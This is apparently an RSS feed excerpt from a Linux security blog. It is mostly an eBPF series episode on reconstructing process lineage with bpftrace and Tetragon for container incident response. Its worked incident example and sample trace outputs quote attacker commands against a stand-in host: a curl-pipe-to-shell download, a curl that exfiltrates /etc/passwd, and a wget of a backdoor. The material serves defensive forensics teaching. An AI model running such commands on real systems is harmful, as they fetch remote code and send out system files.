<p>SSRF gets you IAM credentials. But if the attacker is already inside a container — even a legitimate one — the path to the host is different. The credential-theft chain doesn&#8217;t apply when the attacker already has code execution inside a pod. EP08 covers Kubernetes container escape: <code class="" data-line="">hostPID</code>, <code class="" data-line="">hostNetwork</code>, privileged containers, and the kernel-level paths that take an attacker from container to node. The detection angle is where eBPF enters the picture — syscall-level visibility that catches escape attempts before they complete.</p>
<p>Get EP08 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fssrf-cloud-metadata-imds-capital-one%2F&amp;linkname=SSRF%20to%20Cloud%20Metadata%3A%20How%20IMDSv1%20Enabled%20the%20Capital%20One%20Breach" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fssrf-cloud-metadata-imds-capital-one%2F&amp;linkname=SSRF%20to%20Cloud%20Metadata%3A%20How%20IMDSv1%20Enabled%20the%20Capital%20One%20Breach" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fssrf-cloud-metadata-imds-capital-one%2F&amp;linkname=SSRF%20to%20Cloud%20Metadata%3A%20How%20IMDSv1%20Enabled%20the%20Capital%20One%20Breach" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fssrf-cloud-metadata-imds-capital-one%2F&amp;linkname=SSRF%20to%20Cloud%20Metadata%3A%20How%20IMDSv1%20Enabled%20the%20Capital%20One%20Breach" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fssrf-cloud-metadata-imds-capital-one%2F&amp;linkname=SSRF%20to%20Cloud%20Metadata%3A%20How%20IMDSv1%20Enabled%20the%20Capital%20One%20Breach" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fssrf-cloud-metadata-imds-capital-one%2F&amp;linkname=SSRF%20to%20Cloud%20Metadata%3A%20How%20IMDSv1%20Enabled%20the%20Capital%20One%20Breach" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fssrf-cloud-metadata-imds-capital-one%2F&amp;linkname=SSRF%20to%20Cloud%20Metadata%3A%20How%20IMDSv1%20Enabled%20the%20Capital%20One%20Breach" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fssrf-cloud-metadata-imds-capital-one%2F&#038;title=SSRF%20to%20Cloud%20Metadata%3A%20How%20IMDSv1%20Enabled%20the%20Capital%20One%20Breach" data-a2a-url="https://linuxcent.com/ssrf-cloud-metadata-imds-capital-one/" data-a2a-title="SSRF to Cloud Metadata: How IMDSv1 Enabled the Capital One Breach"></a></p><p>The post <a href="https://linuxcent.com/ssrf-cloud-metadata-imds-capital-one/">SSRF to Cloud Metadata: How IMDSv1 Enabled the Capital One Breach</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/ssrf-cloud-metadata-imds-capital-one/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1861</post-id>	</item>
		<item>
		<title>Process Lineage — Reconstructing What Happened After the Fact</title>
		<link>https://linuxcent.com/ebpf-process-lineage-incident-response/</link>
					<comments>https://linuxcent.com/ebpf-process-lineage-incident-response/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Thu, 18 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[eBPF]]></category>
		<category><![CDATA[Forensics]]></category>
		<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[kprobe]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Process Lineage]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1842</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span>Reconstruct the full process tree of a compromised container — what it spawned, what files it touched, what connections it made — using eBPF kprobe hooks. Even after the process exits.</p>
<p>The post <a href="https://linuxcent.com/ebpf-process-lineage-incident-response/">Process Lineage — Reconstructing What Happened After the Fact</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>eBPF: From Kernel to Cloud, Episode 13</em><br />
<a href="/what-is-ebpf/">What Is eBPF?</a> · <a href="/ebpf-verifier-safety/">The BPF Verifier</a> · <a href="/ebpf-vs-kernel-modules/">eBPF vs Kernel Modules</a> · <a href="/ebpf-program-types/">eBPF Program Types</a> · <a href="/ebpf-maps-persistent-data/">eBPF Maps</a> · <a href="/co-re-libbpf-write-once/">CO-RE and libbpf</a> · <a href="/xdp-network-fast-path/">XDP</a> · <a href="/tc-ebpf-pod-network-policy/">TC eBPF</a> · <a href="/bpftrace-kernel-observability/">bpftrace</a> · <a href="/network-flow-observability-ebpf/">Network Flow Observability</a> · <a href="/dns-kernel-observability/">DNS Observability</a> · <a href="/lsm-ebpf-tetragon-kernel-enforcement/">LSM and Tetragon</a> · <strong>Process Lineage</strong></p>
<hr />
<p style="font-size:0.72em;font-weight:700;letter-spacing:0.12em;color:#f59e0b;text-transform:uppercase;margin:2em 0 0.75em 0;text-align:center;">Architecture Overview</p>
<figure class="wp-block-image size-full" style="margin:0 0 0.5em 0;">
<img fetchpriority="high" decoding="async" width="2400" height="2012" src="https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2.png" alt="eBPF Process Lineage — kernel-level process ancestry tracking for runtime security forensics" class="wp-image-2122" style="width:100%;height:auto;display:block;border-radius:8px;" srcset="https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2.png 2400w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-300x252.png 300w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-1024x858.png 1024w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-768x644.png 768w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-1536x1288.png 1536w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-2048x1717.png 2048w" sizes="(max-width: 2400px) 100vw, 2400px" /><figcaption style="text-align:center;font-size:0.85em;color:#6b7280;margin-top:0.75em;">eBPF tracks every exec() and fork() in the kernel — reconstructing the full process tree for forensic attribution.</figcaption></figure>
<hr style="border:none;border-top:1px solid #e5e7eb;margin:0.5em 0 2em 0;"/>
<h2 id="tldr">TL;DR</h2>
<ul>
<li>Process lineage with eBPF hooks <code class="" data-line="">fork</code> and <code class="" data-line="">exec</code> at the kernel level — building a tamper-resistant record of every process spawned, tied to its parent, pod, namespace, and timestamp<br />
  <em>(kprobe on fork/exec = an eBPF program that fires every time the kernel&#8217;s <code class="" data-line="">fork()</code> or <code class="" data-line="">execve()</code> system call runs, capturing process name, PID, parent PID, and arguments before any userspace observer could be bypassed)</em></li>
<li>Application logs and container stdout can be deleted or suppressed by a compromised process; kernel-level process events written to a ringbuf and exported to a persistent store cannot</li>
<li>The kernel&#8217;s <code class="" data-line="">task_struct</code> contains the complete process identity: PID, PPID, UID, GID, process name, capabilities, and cgroup (which maps directly to a pod)</li>
<li>Tetragon and Falco both build process lineage from kernel events; the difference is storage — Tetragon persists a kernel-side cache of the process tree in BPF maps, Falco reconstructs lineage from an audit log stream</li>
<li>Reconstructing an incident from process lineage requires: who spawned the attacker&#8217;s process, what did it execute, what files did it open, what connections did it make — all correlated by PID and timestamp</li>
<li>Production caution: process events on a busy node can generate high ringbuf write volume; filter aggressively by namespace/cgroup at the eBPF level, not in userspace</li>
</ul>
<hr />
<p>EP12 showed how LSM hooks enforce at the syscall boundary — preventing operations before they complete. Process lineage with eBPF is the complementary capability: when an attacker bypasses enforcement, or when you need to understand what happened before the policy was in place, the kernel-level process record is how you reconstruct the attack chain. This episode covers how that record is built and how to read it.</p>
<h2 id="quick-check-what-process-events-is-your-cluster-already-recording">Quick Check: What Process Events Is Your Cluster Already Recording?</h2>
<pre><code class="" data-line=""># On any cluster node — verify exec tracing is available
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_execve {
    printf(&quot;%-20s %-6d %s\n&quot;, comm, pid, str(args-&gt;filename));
}&#039; --timeout 10

# Expected output:
# containerd-shim     1203   /usr/bin/runc
# runc                1204   /usr/sbin/runc
# sh                  1205   /bin/sh
# node                1842   /usr/local/bin/node
# kube-proxy          2091   /usr/local/bin/kube-proxy
</code></pre>
<pre><code class="" data-line=""># If Tetragon is installed — view the live process lineage stream
kubectl exec -n kube-system \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_EXEC | head -20
</code></pre>
<p>Sample Tetragon output:</p>
<pre><code class="" data-line="">{
  &quot;process_exec&quot;: {
    &quot;process&quot;: {
      &quot;pid&quot;: 18293,
      &quot;binary&quot;: &quot;/bin/sh&quot;,
      &quot;arguments&quot;: &quot;-c health-check.sh&quot;,
      &quot;start_time&quot;: &quot;2026-04-22T09:14:03.412Z&quot;,
      &quot;pod&quot;: {&quot;name&quot;: &quot;my-app-6d4f9-xk2p1&quot;, &quot;namespace&quot;: &quot;production&quot;},
      &quot;parent_pid&quot;: 18201
    },
    &quot;parent&quot;: {
      &quot;pid&quot;: 18201,
      &quot;binary&quot;: &quot;/usr/local/bin/my-app&quot;,
      &quot;pod&quot;: {&quot;name&quot;: &quot;my-app-6d4f9-xk2p1&quot;, &quot;namespace&quot;: &quot;production&quot;}
    }
  }
}
</code></pre>
<p>Each event has the process, its parent, the pod, the namespace, and the full binary path. That&#8217;s the raw material for process lineage reconstruction.</p>
<blockquote>
<p><strong>Not running Tetragon?</strong> Plain bpftrace on the node gives you the same raw data without Kubernetes enrichment — you get PIDs and process names but not pod names or namespaces without the <code class="" data-line="">/proc/&lt;pid&gt;/cgroup</code> mapping step. For incident reconstruction, the Tetragon-enriched stream is significantly more useful because pod attribution is baked in at capture time, not reconstructed afterward.</p>
</blockquote>
<hr />
<p>A container in the <code class="" data-line="">payments</code> namespace was reported compromised. The security team&#8217;s automated response had already restarted the pod — the attacker&#8217;s process was gone. The container&#8217;s filesystem had been reset to the image. The application logs for that pod were deleted when the pod restarted. The Kubernetes event log showed the pod restart but nothing about what had run inside it.</p>
<p>Three questions, no answers yet:<br />
1. What spawned the attacker&#8217;s process? (was it a remote code execution in the app, or a misconfigured exec?)<br />
2. What did the attacker run after getting in? (what did they download, execute, touch?)<br />
3. What network connections did they make? (where did data go, if anywhere?)</p>
<p>The answers were in Tetragon&#8217;s process event export — captured at the kernel level before the pod was restarted, stored in the observability backend, and queryable by pod name and time window. The kernel had seen every exec, every fork, every file open. The restart didn&#8217;t touch that record.</p>
<p>The lineage showed:</p>
<pre><code class="" data-line="">my-app (PID 18201)
  └── sh -c &quot;curl http://attacker.com/payload.sh | sh&quot;  (PID 18293)
        └── sh payload.sh  (PID 18294)
              ├── cat /etc/passwd  (PID 18295)
              ├── curl http://attacker.com/exfil -d @/etc/passwd  (PID 18296)
              └── wget -O /tmp/.x http://attacker.com/backdoor  (PID 18297)
                    └── chmod +x /tmp/.x  (PID 18298)
</code></pre>
<p>Five minutes of attacker activity, fully reconstructed, from a pod that no longer existed.</p>
<hr />
<h2 id="how-the-kernel-tracks-process-identity">How the Kernel Tracks Process Identity</h2>
<p>Every process in Linux is represented by a <code class="" data-line="">task_struct</code> — the kernel&#8217;s internal data structure for a running process. It contains everything the kernel knows about that process.</p>
<blockquote>
<p><strong><code class="" data-line="">task_struct</code></strong> — the kernel&#8217;s primary data structure for a process. Contains: PID, PPID, UID, GID, process name (comm, 15 chars), open file descriptors, memory mappings, namespace references, cgroup membership, capabilities, and a pointer to the parent <code class="" data-line="">task_struct</code>. When bpftrace uses <code class="" data-line="">curtask</code>, it&#8217;s returning a pointer to the current process&#8217;s <code class="" data-line="">task_struct</code>. Reading <code class="" data-line="">curtask-&gt;real_parent-&gt;tgid</code> gives you the parent&#8217;s PID — the foundation of process lineage.</p>
</blockquote>
<p>When a process calls <code class="" data-line="">fork()</code>, the kernel:<br />
1. Allocates a new <code class="" data-line="">task_struct</code> for the child<br />
2. Copies the parent&#8217;s <code class="" data-line="">task_struct</code> fields into the child<br />
3. Sets the child&#8217;s <code class="" data-line="">real_parent</code> pointer to the parent&#8217;s <code class="" data-line="">task_struct</code><br />
4. Assigns the child a new PID<br />
5. Returns the child&#8217;s PID to the parent, and 0 to the child</p>
<p>When the child calls <code class="" data-line="">execve()</code>, the kernel:<br />
1. Validates the binary (verifier/capability checks, LSM hooks)<br />
2. Replaces the process&#8217;s memory image with the new binary<br />
3. Updates <code class="" data-line="">task_struct-&gt;comm</code> with the new process name<br />
4. The PID does not change — <code class="" data-line="">execve</code> replaces the process image but not the process identity</p>
<p>This <code class="" data-line="">fork</code> → <code class="" data-line="">exec</code> sequence is how every shell command works: the shell forks a child, the child execs the command. eBPF hooks on both events, correlated by PID and parent PID, give you the complete tree.</p>
<hr />
<h2 id="building-the-process-tree-with-kprobes">Building the Process Tree with kprobes</h2>
<p>The two core hooks for process lineage:</p>
<pre><code class="" data-line=""># Every fork — capture parent/child relationship
bpftrace -e &#039;
tracepoint:syscalls:sys_exit_clone {
    if (retval &gt; 0) {
        # retval is the child PID (from parent&#039;s perspective)
        printf(&quot;FORK parent=%-6d child=%-6d parent_comm=%-20s\n&quot;,
               pid, retval, comm);
    }
}&#039;
</code></pre>
<pre><code class="" data-line=""># Every exec — capture what binary replaced the process image
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_execve {
    printf(&quot;EXEC pid=%-6d ppid=%-6d binary=%-40s args=%s\n&quot;,
           pid,
           curtask-&gt;real_parent-&gt;tgid,
           str(args-&gt;filename),
           str(*args-&gt;argv));
}&#039;
</code></pre>
<p>Combined output (30 seconds, simplified):</p>
<pre><code class="" data-line="">FORK parent=18201 child=18293  parent_comm=my-app
EXEC pid=18293 ppid=18201 binary=/bin/sh              args=sh -c curl http://...
FORK parent=18293 child=18294  parent_comm=sh
EXEC pid=18294 ppid=18293 binary=/bin/sh              args=sh payload.sh
FORK parent=18294 child=18295  parent_comm=sh
EXEC pid=18295 ppid=18294 binary=/bin/cat             args=cat /etc/passwd
FORK parent=18294 child=18296  parent_comm=sh
EXEC pid=18296 ppid=18294 binary=/usr/bin/curl        args=curl http://attacker.com/exfil -d @/etc/passwd
</code></pre>
<p>Each line is a kernel event. The parent/child PID chain is the tree. Rendered:</p>
<pre><code class="" data-line="">my-app (18201)
  └── sh (18293) — &quot;sh -c curl http://attacker.com/payload.sh | sh&quot;
        └── sh (18294) — &quot;sh payload.sh&quot;
              ├── cat (18295) — &quot;/etc/passwd&quot;
              └── curl (18296) — &quot;http://attacker.com/exfil -d @/etc/passwd&quot;
</code></pre>
<p>This tree is constructed entirely from kernel events. No application logging. No container stdout. No agent inside the container.</p>
<hr />
<h2 id="how-tetragon-stores-the-process-tree-in-bpf-maps">How Tetragon Stores the Process Tree in BPF Maps</h2>
<p>bpftrace&#8217;s approach above produces an event stream — a log you reconstruct manually. Tetragon takes a different approach: it maintains a live process tree in BPF maps, updated on every fork and exec event, persistently queryable.</p>
<pre><code class="" data-line="">Kernel events (kprobe on clone, execve, exit)
      ↓
Tetragon eBPF programs
      ↓
Write to BPF_MAP_TYPE_HASH: process_cache
      key: PID
      value: {binary, args, start_time, parent_pid, pod_name, namespace, uid, gid, caps}
      ↓
Tetragon userspace agent
      reads process_cache on events
      enriches with Kubernetes pod metadata (from informer cache)
      exports to gRPC stream → observability backend
</code></pre>
<blockquote>
<p><strong><code class="" data-line="">task_struct</code> in BPF maps</strong> — Tetragon doesn&#8217;t store the raw <code class="" data-line="">task_struct</code> pointer in its maps (pointers are not stable across process lifetime). Instead, it stores a snapshot of the relevant fields (PID, binary path, arguments, capabilities, cgroup path, start time) at the moment of the exec event, keyed by PID. When the process exits, the entry is kept in the cache for a configurable window to allow late-arriving events (like file closes or connection terminations) to be correlated back to the originating process.</p>
</blockquote>
<p>To inspect Tetragon&#8217;s process cache directly:</p>
<pre><code class="" data-line=""># Find the Tetragon process cache map
bpftool map list | grep process_cache

# 112: hash  name process_cache  flags 0x0
#      key 4B  value 256B  max_entries 65536  memlock 16777216B

# Dump a few entries
bpftool map dump id 112 | head -60

# [{
#     &quot;key&quot;: 18293,                           # ← PID
#     &quot;value&quot;: {
#         &quot;binary&quot;: &quot;/bin/sh&quot;,
#         &quot;args&quot;: &quot;sh -c curl http://...&quot;,
#         &quot;pid&quot;: 18293,
#         &quot;ppid&quot;: 18201,
#         &quot;uid&quot;: 1000,
#         &quot;start_time&quot;: 1745296443,
#         &quot;cgroup&quot;: &quot;kubepods/burstable/pod3f8a21bc/.../payments&quot;
#     }
# }]
</code></pre>
<p>The <code class="" data-line="">cgroup</code> field maps directly to the pod — same path as <code class="" data-line="">/proc/&lt;pid&gt;/cgroup</code> but captured at exec time and stored in kernel space.</p>
<hr />
<h2 id="correlating-files-and-connections-to-the-process-tree">Correlating Files and Connections to the Process Tree</h2>
<p>Process lineage is most useful when combined with the file access and network connection events from the same process. Tetragon&#8217;s TracingPolicy supports this multi-event correlation natively:</p>
<pre><code class="" data-line="">apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: observe-process-lineage
spec:
  kprobes:
    - call: &quot;security_inode_permission&quot;
      syscall: false
      args:
        - index: 0
          type: &quot;inode&quot;
      selectors:
        - matchNamespaces:
            - namespace: Net
              operator: &quot;NotIn&quot;
              values: [&quot;1&quot;]    # exclude host network namespace
          matchActions:
            - action: Post   # audit: log but don&#039;t block
    - call: &quot;tcp_connect&quot;
      syscall: false
      args:
        - index: 0
          type: &quot;sock&quot;
      selectors:
        - matchActions:
            - action: Post
</code></pre>
<p>With this policy active, Tetragon emits events for both file access and TCP connections, each carrying the full process context (PID, binary, pod, parent). Correlated by PID and timestamp:</p>
<pre><code class="" data-line="">tetra getevents | jq &#039;select(.process_kprobe.function_name == &quot;tcp_connect&quot;) |
  {pid: .process_kprobe.process.pid,
   binary: .process_kprobe.process.binary,
   pod: .process_kprobe.process.pod.name,
   dst: .process_kprobe.args[0].sock_arg.daddr}&#039;
</code></pre>
<p>Sample output:</p>
<pre><code class="" data-line="">{&quot;pid&quot;: 18296, &quot;binary&quot;: &quot;/usr/bin/curl&quot;, &quot;pod&quot;: &quot;my-app-6d4f9-xk2p1&quot;, &quot;dst&quot;: &quot;93.184.216.34&quot;}
{&quot;pid&quot;: 18297, &quot;binary&quot;: &quot;/usr/bin/wget&quot;, &quot;pod&quot;: &quot;my-app-6d4f9-xk2p1&quot;, &quot;dst&quot;: &quot;93.184.216.34&quot;}
</code></pre>
<p>PID 18296 and 18297 both connected to the same IP. Cross-reference with the process tree: those are the <code class="" data-line="">curl</code> and <code class="" data-line="">wget</code> spawned by the attacker&#8217;s payload script. The destination IP is the attacker&#8217;s infrastructure. The timeline is milliseconds-precise because the events are timestamped by the kernel at the hook point.</p>
<hr />
<h2 id="building-process-lineage-without-tetragon">Building Process Lineage Without Tetragon</h2>
<p>If you&#8217;re not running Tetragon, you can build a basic process lineage recorder with bpftrace that writes to a file:</p>
<pre><code class="" data-line=""># Record all exec events to a file — run in the background on the node
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_execve {
    printf(&quot;%llu EXEC pid=%-6d ppid=%-6d binary=%s\n&quot;,
           nsecs, pid, curtask-&gt;real_parent-&gt;tgid, str(args-&gt;filename));
}
tracepoint:sched:sched_process_exit {
    printf(&quot;%llu EXIT pid=%-6d comm=%s\n&quot;, nsecs, pid, comm);
}
&#039; &gt; /var/log/process-lineage.log &amp;

# Tail the log for real-time observation
tail -f /var/log/process-lineage.log
</code></pre>
<p>Sample output:</p>
<pre><code class="" data-line="">1745296443123456789 EXEC pid=18293 ppid=18201 binary=/bin/sh
1745296443234567890 EXEC pid=18294 ppid=18293 binary=/bin/sh
1745296443345678901 EXEC pid=18295 ppid=18294 binary=/bin/cat
1745296443456789012 EXIT pid=18295 comm=cat
1745296443567890123 EXEC pid=18296 ppid=18294 binary=/usr/bin/curl
1745296443678901234 EXIT pid=18293 comm=sh
</code></pre>
<p>This file survives pod restarts because it&#8217;s on the node, not in the container. After the pod is restarted, the process lineage record is still on disk. You reconstruct the tree by grouping by <code class="" data-line="">ppid</code> and ordering by timestamp.</p>
<hr />
<h2 id="production-gotchas"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Production Gotchas</h2>
<p><strong>Ringbuf saturation on high-process-churn nodes.</strong> Nodes running serverless workloads or short-lived batch jobs may spawn thousands of processes per minute. Hooking exec on every process at that rate generates a high ringbuf write volume. Filter at the eBPF level by cgroup (namespace) rather than in userspace — sending events to userspace only to discard them wastes ringbuf space and CPU. Tetragon&#8217;s namespace selector does this filtering in the eBPF program before the write.</p>
<p><strong>The 15-character <code class="" data-line="">comm</code> truncation.</strong> The <code class="" data-line="">comm</code> field in <code class="" data-line="">task_struct</code> is limited to 15 characters (plus null terminator). Process names longer than 15 characters are truncated. <code class="" data-line="">bpftrace</code>&#8216;s <code class="" data-line="">comm</code> built-in has the same limit. For the full binary path, read from <code class="" data-line="">execve</code>&#8216;s <code class="" data-line="">filename</code> argument at the tracepoint, not from <code class="" data-line="">comm</code>.</p>
<p><strong>PID reuse.</strong> Linux PIDs are reused after a process exits. In a high-churn environment, a PID you recorded as an attacker process may be reassigned to a legitimate process seconds later. Always pair PIDs with start time and cgroup path when correlating across events. Tetragon&#8217;s process cache keys on PID + start time to handle this.</p>
<p><strong>Exec chains lose argument history.</strong> When <code class="" data-line="">execve</code> replaces the process image, <code class="" data-line="">task_struct-&gt;comm</code> changes but the PID does not. If the attacker&#8217;s shell runs <code class="" data-line="">exec bash</code> to replace itself with a less suspicious binary name, the exec event captures the new binary — but the PID lineage still shows the parent correctly. Don&#8217;t rely on <code class="" data-line="">comm</code> alone for process identity; always track the binary path from the exec event.</p>
<p><strong>Process events don&#8217;t capture file content.</strong> You see that <code class="" data-line="">/bin/cat /etc/passwd</code> ran. You don&#8217;t see what was in <code class="" data-line="">/etc/passwd</code> at that moment unless you also capture file open/read events. Tetragon&#8217;s <code class="" data-line="">security_inode_permission</code> hook tells you which files were accessed; capturing their content requires additional hooks on <code class="" data-line="">vfs_read</code> with buffer capture, which is significantly higher overhead and requires careful data handling for sensitive files.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>What you want</th>
<th>Command</th>
</tr>
</thead>
<tbody>
<tr>
<td>Live exec trace (bpftrace)</td>
<td><code class="" data-line="">bpftrace -e &#039;tracepoint:syscalls:sys_enter_execve { printf(...) }&#039;</code></td>
</tr>
<tr>
<td>Fork + exec tree</td>
<td>Combine <code class="" data-line="">sys_exit_clone</code> + <code class="" data-line="">sys_enter_execve</code> traces, correlate by pid/ppid</td>
</tr>
<tr>
<td>Tetragon process events</td>
<td><code class="" data-line="">tetra getevents --event-types PROCESS_EXEC</code></td>
</tr>
<tr>
<td>Tetragon file + network</td>
<td><code class="" data-line="">tetra getevents --event-types PROCESS_KPROBE</code></td>
</tr>
<tr>
<td>Process cache map</td>
<td><code class="" data-line="">bpftool map list | grep process_cache</code> → <code class="" data-line="">bpftool map dump id N</code></td>
</tr>
<tr>
<td>Map PID to pod</td>
<td><code class="" data-line="">cat /proc/&lt;pid&gt;/cgroup</code> → extract pod UID</td>
</tr>
<tr>
<td>Process exit events</td>
<td><code class="" data-line="">tracepoint:sched:sched_process_exit</code></td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Process event</th>
<th>Kernel hook</th>
</tr>
</thead>
<tbody>
<tr>
<td>New process spawned</td>
<td><code class="" data-line="">tracepoint:syscalls:sys_exit_clone</code> (retval &gt; 0 = child PID)</td>
</tr>
<tr>
<td>Binary executed</td>
<td><code class="" data-line="">tracepoint:syscalls:sys_enter_execve</code></td>
</tr>
<tr>
<td>Process exited</td>
<td><code class="" data-line="">tracepoint:sched:sched_process_exit</code></td>
</tr>
<tr>
<td>File opened</td>
<td><code class="" data-line="">tracepoint:syscalls:sys_enter_openat</code></td>
</tr>
<tr>
<td>Network connect</td>
<td><code class="" data-line="">kprobe:tcp_connect</code></td>
</tr>
<tr>
<td>DNS query</td>
<td><code class="" data-line="">tracepoint:syscalls:sys_enter_sendto</code> (port 53)</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>Process lineage with eBPF hooks <code class="" data-line="">fork</code> and <code class="" data-line="">exec</code> at the kernel level — every process spawned on a node is recorded with its parent PID, binary path, arguments, and container context, regardless of what the container does to suppress application logs</li>
<li>The kernel&#8217;s <code class="" data-line="">task_struct</code> is the authoritative source of process identity; eBPF programs read it at hook time and snapshot the relevant fields into BPF maps before the process can exit or be killed</li>
<li>Tetragon maintains a live process tree in BPF maps, correlates it with Kubernetes metadata, and makes it queryable by pod/namespace — the record persists after the pod is restarted</li>
<li>Incident reconstruction requires correlating process lineage with file access events and network connection events, all correlated by PID and timestamp — eBPF provides all three event streams from the same kernel attachment mechanism</li>
<li>PID reuse is a real concern in high-churn environments; always pair PIDs with start time and cgroup path when correlating across events</li>
